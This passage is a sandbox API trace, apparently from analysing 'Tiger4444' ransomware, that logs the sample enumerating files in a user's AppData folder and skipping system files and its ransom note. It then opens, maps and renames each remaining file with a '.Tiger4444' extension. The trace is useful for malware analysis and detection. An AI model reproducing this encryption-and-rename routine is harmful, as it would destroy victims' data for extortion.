"c:\\users\\fd1hvy\\appdata\\roaming\\sbq20pb9qa7gv5.png.tiger4444"), dwFlags=0x1) returned 1 [0050.103] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd5c77649, ftCreationTime.dwHighDateTime=0x1d327b4, ftLastAccessTime.dwLowDateTime=0xd5c77649, ftLastAccessTime.dwHighDateTime=0x1d327b4, ftLastWriteTime.dwLowDateTime=0xd5c77649, ftLastWriteTime.dwHighDateTime=0x1d327b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Skype", cAlternateFileName="")) returned 1 [0050.103] lstrcmpiW (lpString1="Skype", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.103] lstrcmpiW (lpString1="Skype", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.103] lstrcmpiW (lpString1="Skype", lpString2="Tiger4444.exe") returned -1 [0050.104] lstrcmpiW (lpString1="Skype", lpString2=".") returned 1 [0050.104] lstrcmpiW (lpString1="Skype", lpString2="..") returned 1 [0050.104] lstrcmpiW (lpString1="Skype", lpString2="windows") returned -1 [0050.104] lstrcmpiW (lpString1="Skype", lpString2="bootmgr") returned 1 [0050.104] lstrcmpiW (lpString1="Skype", lpString2="pagefile.sys") returned 1 [0050.104] lstrcmpiW (lpString1="Skype", lpString2="boot") returned 1 [0050.104] lstrcmpiW (lpString1="Skype", lpString2="ids.txt") returned 1 [0050.104] lstrcmpiW (lpString1="Skype", lpString2="NTUSER.DAT") returned 1 [0050.104] lstrcpyW (in: lpString1=0x30aeae8, lpString2="Skype" | out: lpString1="Skype") returned="Skype" [0050.104] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66520 [0050.104] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x4c) returned 0xc611e0 [0050.104] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66528 | out: ListHead=0xc66828, ListEntry=0xc66528) returned 0xc66568 [0050.104] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xad2cc5cd, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xad2cc5cd, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xad2cc5cd, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sun", cAlternateFileName="")) returned 1 [0050.104] lstrcmpiW (lpString1="Sun", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.104] lstrcmpiW (lpString1="Sun", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.104] lstrcmpiW (lpString1="Sun", lpString2="Tiger4444.exe") returned -1 [0050.104] lstrcmpiW (lpString1="Sun", lpString2=".") returned 1 [0050.104] lstrcmpiW (lpString1="Sun", lpString2="..") returned 1 [0050.104] lstrcmpiW (lpString1="Sun", lpString2="windows") returned -1 [0050.104] lstrcmpiW (lpString1="Sun", lpString2="bootmgr") returned 1 [0050.104] lstrcmpiW (lpString1="Sun", lpString2="pagefile.sys") returned 1 [0050.104] lstrcmpiW (lpString1="Sun", lpString2="boot") returned 1 [0050.104] lstrcmpiW (lpString1="Sun", lpString2="ids.txt") returned 1 [0050.104] lstrcmpiW (lpString1="Sun", lpString2="NTUSER.DAT") returned 1 [0050.104] lstrcpyW (in: lpString1=0x30aeae8, lpString2="Sun" | out: lpString1="Sun") returned="Sun" [0050.104] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc665c0 [0050.104] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x48) returned 0xc7b738 [0050.104] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc665c8 | out: ListHead=0xc66828, ListEntry=0xc665c8) returned 0xc66528 [0050.104] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xddc35c00, ftCreationTime.dwHighDateTime=0x1d4d371, ftLastAccessTime.dwLowDateTime=0x65ef2c40, ftLastAccessTime.dwHighDateTime=0x1d4c5b6, ftLastWriteTime.dwLowDateTime=0x65ef2c40, ftLastWriteTime.dwHighDateTime=0x1d4c5b6, nFileSizeHigh=0x0, nFileSizeLow=0x86de, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tkUYMv-IQ SY5z7wi.wav", cAlternateFileName="TKUYMV~1.WAV")) returned 1 [0050.104] lstrcmpiW (lpString1="tkUYMv-IQ SY5z7wi.wav", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.104] lstrcmpiW (lpString1="tkUYMv-IQ SY5z7wi.wav", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.104] lstrcmpiW (lpString1="tkUYMv-IQ SY5z7wi.wav", lpString2="Tiger4444.exe") returned 1 [0050.104] lstrcmpiW (lpString1="tkUYMv-IQ SY5z7wi.wav", lpString2=".") returned 1 [0050.104] lstrcmpiW (lpString1="tkUYMv-IQ SY5z7wi.wav", lpString2="..") returned 1 [0050.104] lstrcmpiW (lpString1="tkUYMv-IQ SY5z7wi.wav", lpString2="windows") returned -1 [0050.104] lstrcmpiW (lpString1="tkUYMv-IQ SY5z7wi.wav", lpString2="bootmgr") returned 1 [0050.104] lstrcmpiW (lpString1="tkUYMv-IQ SY5z7wi.wav", lpString2="pagefile.sys") returned 1 [0050.104] lstrcmpiW (lpString1="tkUYMv-IQ SY5z7wi.wav", lpString2="boot") returned 1 [0050.104] lstrcmpiW (lpString1="tkUYMv-IQ SY5z7wi.wav", lpString2="ids.txt") returned 1 [0050.104] lstrcmpiW (lpString1="tkUYMv-IQ SY5z7wi.wav", lpString2="NTUSER.DAT") returned 1 [0050.105] lstrcpyW (in: lpString1=0x30aeae8, lpString2="tkUYMv-IQ SY5z7wi.wav" | out: lpString1="tkUYMv-IQ SY5z7wi.wav") returned="tkUYMv-IQ SY5z7wi.wav" [0050.105] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\tkUYMv-IQ SY5z7wi.wav", dwFileAttributes=0x0) returned 1 [0050.105] lstrlenW (lpString="tkUYMv-IQ SY5z7wi.wav") returned 21 [0050.105] lstrlenW (lpString="Tiger4444") returned 9 [0050.105] lstrcmpiW (lpString1="5z7wi.wav", lpString2="Tiger4444") returned -1 [0050.105] lstrlenW (lpString=".dll") returned 4 [0050.105] lstrcmpiW (lpString1=".wav", lpString2=".dll") returned 1 [0050.105] lstrlenW (lpString=".lnk") returned 4 [0050.105] lstrcmpiW (lpString1=".wav", lpString2=".lnk") returned 1 [0050.105] lstrlenW (lpString=".ini") returned 4 [0050.105] lstrcmpiW (lpString1=".wav", lpString2=".ini") returned 1 [0050.105] lstrlenW (lpString=".sys") returned 4 [0050.105] lstrcmpiW (lpString1=".wav", lpString2=".sys") returned 1 [0050.105] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\tkUYMv-IQ SY5z7wi.wav" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\tkuymv-iq sy5z7wi.wav"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0050.105] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0050.105] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14155838929) returned 1 [0050.105] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=34526) returned 1 [0050.105] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89a40 [0050.105] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71ae8 [0050.105] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x89e0, lpName=0x0) returned 0x2c8 [0050.106] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x89e0) returned 0xbe0000 [0050.106] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0050.106] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75c98 [0050.106] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0050.107] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75a68 [0050.107] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0050.107] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a68 | out: hHeap=0xc50000) returned 1 [0050.107] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0050.107] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75c98 | out: hHeap=0xc50000) returned 1 [0050.107] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14155999042) returned 1 [0050.107] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89a40 | out: hHeap=0xc50000) returned 1 [0050.107] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71ae8 | out: hHeap=0xc50000) returned 1 [0050.107] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0050.107] CloseHandle (hObject=0x2c8) returned 1 [0050.107] CloseHandle (hObject=0x260) returned 1 [0050.108] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\tkUYMv-IQ SY5z7wi.wav.Tiger4444") returned 63 [0050.108] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\tkUYMv-IQ SY5z7wi.wav" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\tkuymv-iq sy5z7wi.wav"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\tkUYMv-IQ SY5z7wi.wav.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\tkuymv-iq sy5z7wi.wav.tiger4444"), dwFlags=0x1) returned 1 [0050.109] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e778010, ftCreationTime.dwHighDateTime=0x1d4c81c, ftLastAccessTime.dwLowDateTime=0x468eaa60, ftLastAccessTime.dwHighDateTime=0x1d4d37b, ftLastWriteTime.dwLowDateTime=0x468eaa60, ftLastWriteTime.dwHighDateTime=0x1d4d37b, nFileSizeHigh=0x0, nFileSizeLow=0xbdb1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TuYd5M_4-oyQb.ods", cAlternateFileName="TUYD5M~1.ODS")) returned 1 [0050.109] lstrcmpiW (lpString1="TuYd5M_4-oyQb.ods", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.109] lstrcmpiW (lpString1="TuYd5M_4-oyQb.ods", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.109] lstrcmpiW (lpString1="TuYd5M_4-oyQb.ods", lpString2="Tiger4444.exe") returned 1 [0050.109] lstrcmpiW (lpString1="TuYd5M_4-oyQb.ods", lpString2=".") returned 1 [0050.109] lstrcmpiW (lpString1="TuYd5M_4-oyQb.ods", lpString2="..") returned 1 [0050.109] lstrcmpiW (lpString1="TuYd5M_4-oyQb.ods", lpString2="windows") returned -1 [0050.109] lstrcmpiW (lpString1="TuYd5M_4-oyQb.ods", lpString2="bootmgr") returned 1 [0050.109] lstrcmpiW (lpString1="TuYd5M_4-oyQb.ods", lpString2="pagefile.sys") returned 1 [0050.109] lstrcmpiW (lpString1="TuYd5M_4-oyQb.ods", lpString2="boot") returned 1 [0050.109] lstrcmpiW (lpString1="TuYd5M_4-oyQb.ods", lpString2="ids.txt") returned 1 [0050.109] lstrcmpiW (lpString1="TuYd5M_4-oyQb.ods", lpString2="NTUSER.DAT") returned 1 [0050.109] lstrcpyW (in: lpString1=0x30aeae8, lpString2="TuYd5M_4-oyQb.ods" | out: lpString1="TuYd5M_4-oyQb.ods") returned="TuYd5M_4-oyQb.ods" [0050.109] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\TuYd5M_4-oyQb.ods", dwFileAttributes=0x0) returned 1 [0050.109] lstrlenW (lpString="TuYd5M_4-oyQb.ods") returned 17 [0050.109] lstrlenW (lpString="Tiger4444") returned 9 [0050.109] lstrcmpiW (lpString1="-oyQb.ods", lpString2="Tiger4444") returned -1 [0050.109] lstrlenW (lpString=".dll") returned 4 [0050.109] lstrcmpiW (lpString1=".ods", lpString2=".dll") returned 1 [0050.109] lstrlenW (lpString=".lnk") returned 4 [0050.109] lstrcmpiW (lpString1=".ods", lpString2=".lnk") returned 1 [0050.110] lstrlenW (lpString=".ini") returned 4 [0050.110] lstrcmpiW (lpString1=".ods", lpString2=".ini") returned 1 [0050.110] lstrlenW (lpString=".sys") returned 4 [0050.110] lstrcmpiW (lpString1=".ods", lpString2=".sys") returned -1 [0050.110] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\TuYd5M_4-oyQb.ods" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\tuyd5m_4-oyqb.ods"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0050.110] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0050.110] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14156292854) returned 1 [0050.110] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=48561) returned 1 [0050.110] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc897e8 [0050.110] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71ae8 [0050.110] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xc0c0, lpName=0x0) returned 0x2c8 [0050.110] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc0c0) returned 0xbe0000 [0050.112] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0050.112] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75950 [0050.112] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0050.112] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76440 [0050.112] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0050.112] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76440 | out: hHeap=0xc50000) returned 1 [0050.112] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0050.112] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75950 | out: hHeap=0xc50000) returned 1 [0050.112] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14156509520) returned 1 [0050.112] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc897e8 | out: hHeap=0xc50000) returned 1 [0050.112] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71ae8 | out: hHeap=0xc50000) returned 1 [0050.112] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0050.113] CloseHandle (hObject=0x2c8) returned 1 [0050.113] CloseHandle (hObject=0x260) returned 1 [0050.117] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\TuYd5M_4-oyQb.ods.Tiger4444") returned 59 [0050.117] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\TuYd5M_4-oyQb.ods" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\tuyd5m_4-oyqb.ods"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\TuYd5M_4-oyQb.ods.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\tuyd5m_4-oyqb.ods.tiger4444"), dwFlags=0x1) returned 1 [0050.118] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec45b500, ftCreationTime.dwHighDateTime=0x1d4cdab, ftLastAccessTime.dwLowDateTime=0xaa83d680, ftLastAccessTime.dwHighDateTime=0x1d4d08d, ftLastWriteTime.dwLowDateTime=0xaa83d680, ftLastWriteTime.dwHighDateTime=0x1d4d08d, nFileSizeHigh=0x0, nFileSizeLow=0xa84b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="V4Td8ZSwiEkT0.bmp", cAlternateFileName="V4TD8Z~1.BMP")) returned 1 [0050.118] lstrcmpiW (lpString1="V4Td8ZSwiEkT0.bmp", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.118] lstrcmpiW (lpString1="V4Td8ZSwiEkT0.bmp", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.118] lstrcmpiW (lpString1="V4Td8ZSwiEkT0.bmp", lpString2="Tiger4444.exe") returned 1 [0050.118] lstrcmpiW (lpString1="V4Td8ZSwiEkT0.bmp", lpString2=".") returned 1 [0050.118] lstrcmpiW (lpString1="V4Td8ZSwiEkT0.bmp", lpString2="..") returned 1 [0050.118] lstrcmpiW (lpString1="V4Td8ZSwiEkT0.bmp", lpString2="windows") returned -1 [0050.118] lstrcmpiW (lpString1="V4Td8ZSwiEkT0.bmp", lpString2="bootmgr") returned 1 [0050.118] lstrcmpiW (lpString1="V4Td8ZSwiEkT0.bmp", lpString2="pagefile.sys") returned 1 [0050.118] lstrcmpiW (lpString1="V4Td8ZSwiEkT0.bmp", lpString2="boot") returned 1 [0050.118] lstrcmpiW (lpString1="V4Td8ZSwiEkT0.bmp", lpString2="ids.txt") returned 1 [0050.118] lstrcmpiW (lpString1="V4Td8ZSwiEkT0.bmp", lpString2="NTUSER.DAT") returned 1 [0050.118] lstrcpyW (in: lpString1=0x30aeae8, lpString2="V4Td8ZSwiEkT0.bmp" | out: lpString1="V4Td8ZSwiEkT0.bmp") returned="V4Td8ZSwiEkT0.bmp" [0050.118] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\V4Td8ZSwiEkT0.bmp", dwFileAttributes=0x0) returned 1 [0050.118] lstrlenW (lpString="V4Td8ZSwiEkT0.bmp") returned 17 [0050.118] lstrlenW (lpString="Tiger4444") returned 9 [0050.118] lstrcmpiW (lpString1="iEkT0.bmp", lpString2="Tiger4444") returned -1 [0050.119] lstrlenW (lpString=".dll") returned 4 [0050.119] lstrcmpiW (lpString1=".bmp", lpString2=".dll") returned -1 [0050.119] lstrlenW (lpString=".lnk") returned 4 [0050.119] lstrcmpiW (lpString1=".bmp", lpString2=".lnk") returned -1 [0050.119] lstrlenW (lpString=".ini") returned 4 [0050.119] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0050.119] lstrlenW (lpString=".sys") returned 4 [0050.119] lstrcmpiW (lpString1=".bmp", lpString2=".sys") returned -1 [0050.119] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\V4Td8ZSwiEkT0.bmp" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\v4td8zswiekt0.bmp"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0050.119] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0050.119] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14157254158) returned 1 [0050.119] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=43083) returned 1 [0050.120] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89d10 [0050.120] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc721d0 [0050.120] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xab50, lpName=0x0) returned 0x2c8 [0050.120] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xab50) returned 0xbe0000 [0050.121] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0050.121] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc760f8 [0050.121] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0050.121] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76440 [0050.121] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0050.121] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76440 | out: hHeap=0xc50000) returned 1 [0050.121] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0050.121] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc760f8 | out: hHeap=0xc50000) returned 1 [0050.121] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14157431197) returned 1 [0050.121] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89d10 | out: hHeap=0xc50000) returned 1 [0050.121] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc721d0 | out: hHeap=0xc50000) returned 1 [0050.121] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0050.122] CloseHandle (hObject=0x2c8) returned 1 [0050.122] CloseHandle (hObject=0x260) returned 1 [0050.122] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\V4Td8ZSwiEkT0.bmp.Tiger4444") returned 59 [0050.122] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\V4Td8ZSwiEkT0.bmp" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\v4td8zswiekt0.bmp"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\V4Td8ZSwiEkT0.bmp.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\v4td8zswiekt0.bmp.tiger4444"), dwFlags=0x1) returned 1 [0050.123] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x532688a0, ftCreationTime.dwHighDateTime=0x1d4d1bf, ftLastAccessTime.dwLowDateTime=0xe961f800, ftLastAccessTime.dwHighDateTime=0x1d4cb24, ftLastWriteTime.dwLowDateTime=0xe961f800, ftLastWriteTime.dwHighDateTime=0x1d4cb24, nFileSizeHigh=0x0, nFileSizeLow=0xff9b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XkvuMMsv206RYIIfQX.flv", cAlternateFileName="XKVUMM~1.FLV")) returned 1 [0050.123] lstrcmpiW (lpString1="XkvuMMsv206RYIIfQX.flv", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.123] lstrcmpiW (lpString1="XkvuMMsv206RYIIfQX.flv", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.123] lstrcmpiW (lpString1="XkvuMMsv206RYIIfQX.flv", lpString2="Tiger4444.exe") returned 1 [0050.123] lstrcmpiW (lpString1="XkvuMMsv206RYIIfQX.flv", lpString2=".") returned 1 [0050.123] lstrcmpiW (lpString1="XkvuMMsv206RYIIfQX.flv", lpString2="..") returned 1 [0050.123] lstrcmpiW (lpString1="XkvuMMsv206RYIIfQX.flv", lpString2="windows") returned 1 [0050.123] lstrcmpiW (lpString1="XkvuMMsv206RYIIfQX.flv", lpString2="bootmgr") returned 1 [0050.123] lstrcmpiW (lpString1="XkvuMMsv206RYIIfQX.flv", lpString2="pagefile.sys") returned 1 [0050.123] lstrcmpiW (lpString1="XkvuMMsv206RYIIfQX.flv", lpString2="boot") returned 1 [0050.123] lstrcmpiW (lpString1="XkvuMMsv206RYIIfQX.flv", lpString2="ids.txt") returned 1 [0050.123] lstrcmpiW (lpString1="XkvuMMsv206RYIIfQX.flv", lpString2="NTUSER.DAT") returned 1 [0050.123] lstrcpyW (in: lpString1=0x30aeae8, lpString2="XkvuMMsv206RYIIfQX.flv" | out: lpString1="XkvuMMsv206RYIIfQX.flv") returned="XkvuMMsv206RYIIfQX.flv" [0050.123] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\XkvuMMsv206RYIIfQX.flv", dwFileAttributes=0x0) returned 1 [0050.124] lstrlenW (lpString="XkvuMMsv206RYIIfQX.flv") returned 22 [0050.124] lstrlenW (lpString="Tiger4444") returned 9 [0050.124] lstrcmpiW (lpString1="IIfQX.flv", lpString2="Tiger4444") returned -1 [0050.124] lstrlenW (lpString=".dll") returned 4 [0050.124] lstrcmpiW (lpString1=".flv", lpString2=".dll") returned 1 [0050.124] lstrlenW (lpString=".lnk") returned 4 [0050.124] lstrcmpiW (lpString1=".flv", lpString2=".lnk") returned -1 [0050.124] lstrlenW (lpString=".ini") returned 4 [0050.124] lstrcmpiW (lpString1=".flv", lpString2=".ini") returned -1 [0050.124] lstrlenW (lpString=".sys") returned 4 [0050.124] lstrcmpiW (lpString1=".flv", lpString2=".sys") returned -1 [0050.124] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\XkvuMMsv206RYIIfQX.flv" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\xkvummsv206ryiifqx.flv"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0050.124] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0050.124] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14157713652) returned 1 [0050.124] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=65435) returned 1 [0050.124] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc898d8 [0050.124] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71b70 [0050.124] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x102a0, lpName=0x0) returned 0x2c8 [0050.124] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x102a0) returned 0xbe0000 [0050.126] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0050.126] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75a68 [0050.126] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0050.126] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75b80 [0050.126] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0050.126] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75b80 | out: hHeap=0xc50000) returned 1 [0050.126] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0050.126] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a68 | out: 